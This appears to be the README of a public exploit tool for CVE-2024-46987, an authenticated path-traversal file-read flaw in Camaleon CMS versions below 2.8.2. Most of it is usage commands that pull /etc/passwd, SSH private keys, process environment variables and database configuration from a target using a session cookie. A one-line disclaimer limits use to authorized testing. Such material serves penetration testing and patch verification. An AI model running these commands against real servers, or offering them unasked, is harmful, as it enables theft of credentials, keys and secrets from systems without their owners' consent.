Share
## https://sploitus.com/exploit?id=300B85BE-7B44-50B4-AC2A-336B8AFD2D88
# CVE-2024-46987 - Camaleon CMS Local File Inclusion
Authenticated Local File Inclusion (LFI) exploit for Camaleon CMS.
## Vulnerability
Camaleon CMS is vulnerable to an authenticated LFI attack through the `/admin/media/download_private_file` endpoint. The `file` parameter is not properly sanitized, allowing path traversal to read arbitrary files from the server.
## Affected Versions
- Camaleon CMS < 2.8.2
## Requirements
```bash
pip install requests
```
## Usage
```bash
# Print file to terminal (default)
python3 exploit.py -u http://target.com -f /etc/passwd -t "auth_token"
# Save to file
python3 exploit.py -u http://target.com -f /etc/passwd -t "auth_token" -o passwd.txt
```
### Parameters
| Parameter | Description |
|-----------|-------------|
| `-u, --url` | Target URL |
| `-f, --file` | File to read (e.g., `/etc/passwd`) |
| `-t, --token` | `auth_token` cookie value |
| `-o, --output` | Output filename (optional, prints to terminal if not set) |
## Examples
```bash
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "access_token"
# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "access_token" -o id_rsa
# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "access_token"
# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "access_token"
```
## Disclaimer
This tool is intended for authorized security testing and educational purposes only. Only use against systems you have explicit permission to test.
## References
- [CVE-2024-46987](https://nvd.nist.gov/vuln/detail/CVE-2024-46987)
- [Camaleon CMS](https://github.com/owen2345/camaleon-cms)